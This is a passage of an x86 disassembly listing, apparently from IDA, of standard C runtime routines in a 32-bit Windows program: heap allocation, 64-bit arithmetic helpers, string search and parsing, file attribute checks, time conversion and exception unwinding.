add esp, 10h
mov [ebp+var_20], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_414DB9
mov eax, [ebp+var_20]
loc_414DB3: ; CODE XREF: sub_414D67+25�j
call __SEH_epilog
retn
sub_414D67 endp
; =============== S U B R O U T I N E =======================================
sub_414DB9 proc near ; CODE XREF: sub_414D67+44�p
; DATA XREF: .rdata:stru_428D78�o
push dword ptr [ebp-1Ch]
call sub_41804A
pop ecx
retn
sub_414DB9 endp
; =============== S U B R O U T I N E =======================================
sub_414DC3 proc near ; CODE XREF: sub_403BA9+2A�p
; sub_408A18+37B8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_414D67
add esp, 0Ch
retn
sub_414DC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414DD6 proc near ; CODE XREF: sub_414E51+B�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_428D88
call __SEH_prolog
mov esi, [ebp+arg_0]
cmp dword_47C980, 3
jnz short loc_414E1C
cmp esi, dword_47C96C
ja short loc_414E1C
push 4
call sub_418285
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_418ADD
pop ecx
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_414E48
mov eax, [ebp+var_1C]
test eax, eax
jnz short loc_414E3F
loc_414E1C: ; CODE XREF: sub_414DD6+16�j
; sub_414DD6+1E�j
test esi, esi
jnz short loc_414E21
inc esi
loc_414E21: ; CODE XREF: sub_414DD6+48�j
cmp dword_47C980, 1
jz short loc_414E30
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_414E30: ; CODE XREF: sub_414DD6+52�j
push esi
push 0
push dword_47C97C
call ds:dword_42005C ; RtlAllocateHeap
loc_414E3F: ; CODE XREF: sub_414DD6+44�j
call __SEH_epilog
retn
sub_414DD6 endp
; =============== S U B R O U T I N E =======================================
sub_414E45 proc near ; DATA XREF: .rdata:stru_428D88�o
mov esi, [ebp+8]
sub_414E45 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_414E48 proc near ; CODE XREF: sub_414DD6+3A�p
push 4
call sub_4181F1
pop ecx
retn
sub_414E48 endp
; =============== S U B R O U T I N E =======================================
sub_414E51 proc near ; CODE XREF: sub_414E7D+A�p
; sub_4155FE+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_414E7A
loc_414E58: ; CODE XREF: sub_414E51+27�j
push [esp+arg_0]
call sub_414DD6
test eax, eax
pop ecx
jnz short locret_414E7C
cmp [esp+arg_4], eax
jz short locret_414E7C
push [esp+arg_0]
call sub_41947D
test eax, eax
pop ecx
jnz short loc_414E58
loc_414E7A: ; CODE XREF: sub_414E51+5�j
xor eax, eax
locret_414E7C: ; CODE XREF: sub_414E51+13�j
; sub_414E51+19�j
retn
sub_414E51 endp
; =============== S U B R O U T I N E =======================================
sub_414E7D proc near ; CODE XREF: sub_402E1B+1E�p
; sub_407C73+5E�p ...
arg_0 = dword ptr 4
push dword_47C35C
push [esp+4+arg_0]
call sub_414E51
pop ecx
pop ecx
retn
sub_414E7D endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414E90 proc near ; CODE XREF: sub_4021B5+190�p
; sub_41126C+114�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_414EA9
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_414EA9: ; CODE XREF: sub_414E90+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_414E90 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_414EC5 proc near ; CODE XREF: sub_414EFD�p
mov eax, offset sub_419B69
mov off_42DE88, eax
mov off_42DE8C, offset sub_4197E3
mov off_42DE90, offset sub_419848
mov off_42DE94, offset sub_4197A7
mov off_42DE98, offset sub_41982E
mov off_42DE9C, eax
retn
sub_414EC5 endp
; =============== S U B R O U T I N E =======================================
sub_414EFD proc near ; CODE XREF: sub_415F5B+9�p
; DATA XREF: .data:off_42D798�o
call sub_414EC5
call sub_419C0C
mov dword_47C19C, eax
call sub_419BBA
fnclex
retn
sub_414EFD endp
; =============== S U B R O U T I N E =======================================
sub_414F14 proc near ; CODE XREF: sub_402B23+8�p
; sub_413FFD+FE�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call ds:dword_4200A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_414F34
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
call sub_419612
pop ecx
loc_414F30: ; CODE XREF: sub_414F14+41�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_414F34: ; CODE XREF: sub_414F14+D�j
test al, 1
jz short loc_414F57
test [esp+arg_4], 2
jz short loc_414F57
call sub_419600
mov dword ptr [eax], 0Dh
call sub_419609
mov dword ptr [eax], 5
jmp short loc_414F30
; ---------------------------------------------------------------------------
loc_414F57: ; CODE XREF: sub_414F14+22�j
; sub_414F14+29�j
xor eax, eax
retn
sub_414F14 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414F60 proc near ; CODE XREF: sub_402B3D+2A�p
; sub_416662+60D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_414F91
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+4+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+4+arg_8]
add edx, ecx
jmp short loc_414FD8
; ---------------------------------------------------------------------------
loc_414F91: ; CODE XREF: sub_414F60+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_414F9F: ; CODE XREF: sub_414F60+49�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_414F9F
div ebx
mov esi, eax
mul [esp+4+arg_C]
mov ecx, eax
mov eax, [esp+4+arg_8]
mul esi
add edx, ecx
jb short loc_414FCD
cmp edx, [esp+4+arg_4]
ja short loc_414FCD
jb short loc_414FD6
cmp eax, [esp+4+arg_0]
jbe short loc_414FD6
loc_414FCD: ; CODE XREF: sub_414F60+5D�j
; sub_414F60+63�j
dec esi
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_414FD6: ; CODE XREF: sub_414F60+65�j
; sub_414F60+6B�j
xor ebx, ebx
loc_414FD8: ; CODE XREF: sub_414F60+2F�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
pop esi
retn 10h
sub_414F60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415000 proc near ; CODE XREF: sub_402C41+5F�p
; sub_402C41+90�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_415021
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_415021: ; CODE XREF: sub_415000+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_41503D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_41503D: ; CODE XREF: sub_415000+27�j
or eax, eax
jnz short loc_415059
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_41509A
; ---------------------------------------------------------------------------
loc_415059: ; CODE XREF: sub_415000+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_415067: ; CODE XREF: sub_415000+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_415067
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_415095
cmp edx, [esp+0Ch+arg_4]
ja short loc_415095
jb short loc_415096
cmp eax, [esp+0Ch+arg_0]
jbe short loc_415096
loc_415095: ; CODE XREF: sub_415000+85�j
; sub_415000+8B�j
dec esi
loc_415096: ; CODE XREF: sub_415000+8D�j
; sub_415000+93�j
xor edx, edx
mov eax, esi
loc_41509A: ; CODE XREF: sub_415000+57�j
dec edi
jnz short loc_4150A4
neg edx
neg eax
sbb edx, 0
loc_4150A4: ; CODE XREF: sub_415000+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_415000 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4150B0 proc near ; CODE XREF: sub_4031EB+C6�p
; sub_4031EB+133�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_415130
mov dh, [ecx+1]
test dh, dh
jz short loc_41511D
loc_4150C8: ; CODE XREF: sub_4150B0+58�j
; sub_4150B0+6B�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
add esi, 1
cmp al, dl
jz short loc_4150EE
test al, al
jz short loc_4150E8
loc_4150DB: ; CODE XREF: sub_4150B0+36�j
mov al, [esi]
add esi, 1
loc_4150E0: ; CODE XREF: sub_4150B0+45�j
cmp al, dl
jz short loc_4150EE
test al, al
jnz short loc_4150DB
loc_4150E8: ; CODE XREF: sub_4150B0+29�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4150EE: ; CODE XREF: sub_4150B0+25�j
; sub_4150B0+32�j
mov al, [esi]
add esi, 1
cmp al, dh
jnz short loc_4150E0
lea edi, [esi-1]
loc_4150FA: ; CODE XREF: sub_4150B0+69�j
mov ah, [ecx+2]
test ah, ah
jz short loc_415129
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_4150C8
mov al, [ecx+3]
test al, al
jz short loc_415129
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_4150FA
jmp short loc_4150C8
; ---------------------------------------------------------------------------
loc_41511D: ; CODE XREF: sub_4150B0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_415A96
; ---------------------------------------------------------------------------
loc_415129: ; CODE XREF: sub_4150B0+4F�j
; sub_4150B0+5F�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_415130: ; CODE XREF: sub_4150B0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_4150B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415136 proc near ; CODE XREF: sub_4031EB+BF�p
; sub_4031EB+12C�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 18h
push offset stru_428D98
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_1C], ebx
call sub_416E15
mov esi, [eax+64h]
mov [ebp+var_20], esi
cmp esi, off_42D83C
jz short loc_415164
call sub_417C4E
mov esi, eax
mov [ebp+var_20], esi
loc_415164: ; CODE XREF: sub_415136+22�j
mov eax, [esi+14h]
cmp eax, ebx
jnz short loc_415193
mov eax, [ebp+arg_0]
mov edx, eax
cmp [eax], bl
jz loc_415241
loc_415178: ; CODE XREF: sub_415136+56�j
mov cl, [edx]
cmp cl, 61h
jl short loc_415189
cmp cl, 7Ah
jg short loc_415189
sub cl, 20h
mov [edx], cl
loc_415189: ; CODE XREF: sub_415136+47�j
; sub_415136+4C�j
inc edx
cmp [edx], bl
jnz short loc_415178
jmp loc_415241
; ---------------------------------------------------------------------------
loc_415193: ; CODE XREF: sub_415136+33�j
push 1
push dword ptr [esi+4]
push ebx
push ebx
push 0FFFFFFFFh
push [ebp+arg_0]
push 200h
push eax
call sub_419E09
add esp, 20h
mov [ebp+var_24], eax
cmp eax, ebx
jz loc_41523E
mov [ebp+ms_exc.disabled], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_414800
mov [ebp+ms_exc.old_esp], esp
mov edi, esp
mov [ebp+var_28], edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_4151EB
; ---------------------------------------------------------------------------
loc_4151D4: ; DATA XREF: .rdata:stru_428D98�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4151D8: ; DATA XREF: .rdata:stru_428D98�o
mov esp, [ebp+ms_exc.old_esp]
call sub_419D38
xor ebx, ebx
xor edi, edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_20]
loc_4151EB: ; CODE XREF: sub_415136+9C�j
cmp edi, ebx
jnz short loc_415205
push [ebp+var_24]
call sub_414E7D
pop ecx
mov edi, eax
mov [ebp+var_1C], 1
cmp edi, ebx
jz short loc_415232
loc_415205: ; CODE XREF: sub_415136+B7�j
push 1
push dword ptr [esi+4]
push [ebp+var_24]
push edi
push 0FFFFFFFFh
push [ebp+arg_0]
push 200h
push dword ptr [esi+14h]
call sub_419E09
add esp, 20h
test eax, eax
jz short loc_415232
push edi
push [ebp+arg_0]
call sub_419C40
pop ecx
pop ecx
loc_415232: ; CODE XREF: sub_415136+CD�j
; sub_415136+EF�j
cmp [ebp+var_1C], ebx
jz short loc_41523E
push edi
call sub_414A14
pop ecx
loc_41523E: ; CODE XREF: sub_415136+7C�j
; sub_415136+FF�j
mov eax, [ebp+arg_0]
loc_415241: ; CODE XREF: sub_415136+3C�j
; sub_415136+58�j
lea esp, [ebp-34h]
call __SEH_epilog
retn
sub_415136 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41524A proc near ; CODE XREF: sub_415409+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
call sub_416E15
mov esi, [eax+64h]
cmp esi, off_42D83C
jz short loc_415268
call sub_417C4E
mov esi, eax
loc_415268: ; CODE XREF: sub_41524A+15�j
mov ecx, [ebp+arg_0]
and [ebp+var_4], 0
mov bl, [ecx]
lea edi, [ecx+1]
loc_415274: ; CODE XREF: sub_41524A+55�j
cmp dword ptr [esi+28h], 1
movzx eax, bl
jle short loc_41528E
push 8
push eax
push esi
call sub_417A4B
mov ecx, [ebp+arg_0]
add esp, 0Ch
jmp short loc_415298
; ---------------------------------------------------------------------------
loc_41528E: ; CODE XREF: sub_41524A+31�j
mov edx, [esi+48h]
movzx eax, byte ptr [edx+eax*2]
and eax, 8
loc_415298: ; CODE XREF: sub_41524A+42�j
test eax, eax
jz short loc_4152A1
mov bl, [edi]
inc edi
jmp short loc_415274
; ---------------------------------------------------------------------------
loc_4152A1: ; CODE XREF: sub_41524A+50�j
cmp bl, 2Dh
jnz short loc_4152AC
or [ebp+arg_C], 2
jmp short loc_4152B1
; ---------------------------------------------------------------------------
loc_4152AC: ; CODE XREF: sub_41524A+5A�j
cmp bl, 2Bh
jnz short loc_4152B4
loc_4152B1: ; CODE XREF: sub_41524A+60�j
mov bl, [edi]
inc edi
loc_4152B4: ; CODE XREF: sub_41524A+65�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_4153F9
cmp eax, 1
jz loc_4153F9
cmp eax, 24h
jg loc_4153F9
test eax, eax
push 10h
pop ecx
jnz short loc_4152FC
cmp bl, 30h
jz short loc_4152E6
mov [ebp+arg_8], 0Ah
jmp short loc_415314
; ---------------------------------------------------------------------------
loc_4152E6: ; CODE XREF: sub_41524A+91�j
mov al, [edi]
cmp al, 78h
jz short loc_4152F9
cmp al, 58h
jz short loc_4152F9
mov [ebp+arg_8], 8
jmp short loc_415314
; ---------------------------------------------------------------------------
loc_4152F9: ; CODE XREF: sub_41524A+A0�j
; sub_41524A+A4�j
mov [ebp+arg_8], ecx
loc_4152FC: ; CODE XREF: sub_41524A+8C�j
cmp [ebp+arg_8], ecx
jnz short loc_415314
cmp bl, 30h
jnz short loc_415314
mov al, [edi]
cmp al, 78h
jz short loc_415310
cmp al, 58h
jnz short loc_415314
loc_415310: ; CODE XREF: sub_41524A+C0�j
inc edi
mov bl, [edi]
inc edi
loc_415314: ; CODE XREF: sub_41524A+9A�j
; sub_41524A+AD�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
loc_41531C: ; CODE XREF: sub_41524A+134�j
mov esi, off_42DEA0
movzx ecx, bl
mov cx, [esi+ecx*2]
test cl, 4
jz short loc_415336
movsx ecx, bl
sub ecx, 30h
jmp short loc_415355
; ---------------------------------------------------------------------------
loc_415336: ; CODE XREF: sub_41524A+E2�j
test cx, 103h
jz short loc_415380
cmp bl, 61h
jl short loc_41534F
cmp bl, 7Ah
jg short loc_41534F
movsx ecx, bl
sub ecx, 20h
jmp short loc_415352
; ---------------------------------------------------------------------------
loc_41534F: ; CODE XREF: sub_41524A+F6�j
; sub_41524A+FB�j
movsx ecx, bl
loc_415352: ; CODE XREF: sub_41524A+103�j
add ecx, 0FFFFFFC9h
loc_415355: ; CODE XREF: sub_41524A+EA�j
cmp ecx, [ebp+arg_8]
jnb short loc_415380
or [ebp+arg_C], 8
cmp [ebp+var_4], eax
jb short loc_41536F
jnz short loc_415369
cmp ecx, edx
jbe short loc_41536F
loc_415369: ; CODE XREF: sub_41524A+119�j
or [ebp+arg_C], 4
jmp short loc_41537B
; ---------------------------------------------------------------------------
loc_41536F: ; CODE XREF: sub_41524A+117�j
; sub_41524A+11D�j
mov esi, [ebp+var_4]
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_4], esi
loc_41537B: ; CODE XREF: sub_41524A+123�j
mov bl, [edi]
inc edi
jmp short loc_41531C
; ---------------------------------------------------------------------------
loc_415380: ; CODE XREF: sub_41524A+F1�j
; sub_41524A+10E�j
mov eax, [ebp+arg_C]
dec edi
test al, 8
jnz short loc_415397
cmp [ebp+arg_4], 0
jz short loc_415391
mov edi, [ebp+arg_0]
loc_415391: ; CODE XREF: sub_41524A+142�j
and [ebp+var_4], 0
jmp short loc_4153E2
; ---------------------------------------------------------------------------
loc_415397: ; CODE XREF: sub_41524A+13C�j
test al, 4
mov esi, 7FFFFFFFh
jnz short loc_4153BB
test al, 1
jnz short loc_4153E2
and eax, 2
jz short loc_4153B2
cmp [ebp+var_4], 80000000h
ja short loc_4153BB
loc_4153B2: ; CODE XREF: sub_41524A+15D�j
test eax, eax
jnz short loc_4153E2
cmp [ebp+var_4], esi
jbe short loc_4153E2
loc_4153BB: ; CODE XREF: sub_41524A+154�j
; sub_41524A+166�j
call sub_419600
test byte ptr [ebp+arg_C], 1
mov dword ptr [eax], 22h
jz short loc_4153D2
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4153E2
; ---------------------------------------------------------------------------
loc_4153D2: ; CODE XREF: sub_41524A+180�j
mov al, byte ptr [ebp+arg_C]
and al, 2
neg al
sbb eax, eax
neg eax
add eax, esi
mov [ebp+var_4], eax
loc_4153E2: ; CODE XREF: sub_41524A+14B�j
; sub_41524A+158�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_4153EB
mov [eax], edi
loc_4153EB: ; CODE XREF: sub_41524A+19D�j
test byte ptr [ebp+arg_C], 2
jz short loc_4153F4
neg [ebp+var_4]
loc_4153F4: ; CODE XREF: sub_41524A+1A5�j
mov eax, [ebp+var_4]
jmp short loc_415404
; ---------------------------------------------------------------------------
loc_4153F9: ; CODE XREF: sub_41524A+6F�j
; sub_41524A+78�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_415402
mov [eax], ecx
loc_415402: ; CODE XREF: sub_41524A+1B4�j
xor eax, eax
loc_415404: ; CODE XREF: sub_41524A+1AD�j
pop edi
pop esi
pop ebx
leave
retn
sub_41524A endp
; =============== S U B R O U T I N E =======================================
sub_415409 proc near ; CODE XREF: sub_403C3B+440�p
; sub_408A18+27FE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41524A
add esp, 10h
retn
sub_415409 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415420 proc near ; CODE XREF: sub_403C3B+50�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_8]
push eax
call ds:dword_42015C ; GetSystemTimeAsFileTime
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
push 0
add eax, 2AC18000h
push 989680h
adc ecx, 0FE624E21h
push ecx
push eax
call sub_416160
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short locret_415457
mov [ecx], eax
locret_415457: ; CODE XREF: sub_415420+33�j
leave
retn
sub_415420 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415459 proc near ; CODE XREF: sub_4041E2+2A�p
; sub_404C6A+FD�p ...
var_24 = byte ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
mov eax, dword_42DEA8
xor eax, [ebp+4]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov [ebp+var_4], eax
call sub_416E15
push 8
pop ecx
mov [ebp+arg_4], eax
xor eax, eax
lea edi, [ebp+var_24]
push 7
rep stosd
pop edi
loc_415485: ; CODE XREF: sub_415459+45�j
mov dl, [esi]
movzx ecx, dl
mov eax, ecx
and ecx, edi
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+var_24]
or [eax], bl
inc esi
test dl, dl
jnz short loc_415485
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_4154B4
mov eax, [ebp+arg_4]
mov edx, [eax+18h]
jmp short loc_4154B4
; ---------------------------------------------------------------------------
loc_4154AF: ; CODE XREF: sub_415459+72�j
test al, al
jz short loc_4154CD
inc edx
loc_4154B4: ; CODE XREF: sub_415459+4C�j
; sub_415459+54�j
mov al, [edx]
movzx esi, al
xor ebx, ebx
mov ecx, esi
and ecx, edi
inc ebx
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test bl, cl
jnz short loc_4154AF
loc_4154CD: ; CODE XREF: sub_415459+58�j
mov ebx, edx
jmp short loc_4154E9
; ---------------------------------------------------------------------------
loc_4154D1: ; CODE XREF: sub_415459+93�j
movzx esi, byte ptr [edx]
xor eax, eax
mov ecx, esi
and ecx, edi
inc eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test al, cl
jnz short loc_4154F0
inc edx
loc_4154E9: ; CODE XREF: sub_415459+76�j
cmp byte ptr [edx], 0
jnz short loc_4154D1
jmp short loc_4154F4
; ---------------------------------------------------------------------------
loc_4154F0: ; CODE XREF: sub_415459+8D�j
and byte ptr [edx], 0
inc edx
loc_4154F4: ; CODE XREF: sub_415459+95�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax+18h], edx
mov eax, ebx
sub eax, edx
neg eax
sbb eax, eax
xor ecx, [ebp+4]
pop edi
and eax, ebx
pop esi
pop ebx
call sub_41A1F6
leave
retn
sub_415459 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415514 proc near ; CODE XREF: sub_4155DC+1A�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi+14h], 0
push edi
jz loc_4155C8
cmp dword ptr [esi+24h], 0
jz short loc_41553A
cmp ebx, 7Fh
jbe loc_4155C8
loc_41553A: ; CODE XREF: sub_415514+1B�j
xor edi, edi
inc edi
cmp ebx, 100h
jnb short loc_415564
cmp [esi+28h], edi
jle short loc_415557
push edi
push ebx
push esi
call sub_417A4B
add esp, 0Ch
jmp short loc_415560
; ---------------------------------------------------------------------------
loc_415557: ; CODE XREF: sub_415514+34�j
mov eax, [esi+48h]
movzx eax, byte ptr [eax+ebx*2]
and eax, edi
loc_415560: ; CODE XREF: sub_415514+41�j
test eax, eax
jz short loc_4155D5
loc_415564: ; CODE XREF: sub_415514+2F�j
mov edx, [esi+48h]
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_415585
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_41558E
; ---------------------------------------------------------------------------
loc_415585: ; CODE XREF: sub_415514+60�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, edi
loc_41558E: ; CODE XREF: sub_415514+6F�j
push edi
push dword ptr [esi+4]
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 100h
push dword ptr [esi+14h]
call sub_419E09
add esp, 20h
test eax, eax
jz short loc_4155D5
cmp eax, edi
jnz short loc_4155BB
movzx eax, [ebp+var_4]
jmp short loc_4155D7
; ---------------------------------------------------------------------------
loc_4155BB: ; CODE XREF: sub_415514+9F�j
movzx ecx, [ebp+var_3]
xor eax, eax
mov ah, [ebp+var_4]
or eax, ecx
jmp short loc_4155D7
; ---------------------------------------------------------------------------
loc_4155C8: ; CODE XREF: sub_415514+11�j
; sub_415514+20�j
cmp ebx, 41h
jl short loc_4155D5
cmp ebx, 5Ah
lea eax, [ebx+20h]
jle short loc_4155D7
loc_4155D5: ; CODE XREF: sub_415514+4E�j
; sub_415514+9B�j ...
mov eax, ebx
loc_4155D7: ; CODE XREF: sub_415514+A5�j
; sub_415514+B2�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_415514 endp
; =============== S U B R O U T I N E =======================================
sub_4155DC proc near ; CODE XREF: sub_406808+6�p
; sub_406BF3+56�p ...
arg_0 = dword ptr 4
call sub_416E15
mov eax, [eax+64h]
cmp eax, off_42D83C
jz short loc_4155F1
call sub_417C4E
loc_4155F1: ; CODE XREF: sub_4155DC+E�j
push [esp+arg_0]
push eax
call sub_415514
pop ecx
pop ecx
retn
sub_4155DC endp
; =============== S U B R O U T I N E =======================================
sub_4155FE proc near ; CODE XREF: sub_407023+27�p
; sub_407064+4D�p
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_414E51
pop ecx
pop ecx
retn
sub_4155FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41560C proc near ; CODE XREF: sub_41A6C4+60�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_41560C endp
; ---------------------------------------------------------------------------
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_41563C proc near ; CODE XREF: sub_41A33F+25�p
; sub_41A548+149�p ...
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_41563C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415643 proc near ; CODE XREF: sub_4156EF+5A�p
; sub_41A6C4:loc_41A6E7�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, large fs:0
mov [ebp+var_4], esi
mov [ebp+var_8], offset loc_41566C
push 0
push [ebp+arg_4]
push [ebp+var_8]
push [ebp+arg_0]
call sub_41F5A6 ; RtlUnwind
loc_41566C: ; DATA XREF: sub_415643+12�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and eax, 0FFFFFFFDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov edi, large fs:0
mov ebx, [ebp+var_4]
mov [ebx], edi
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
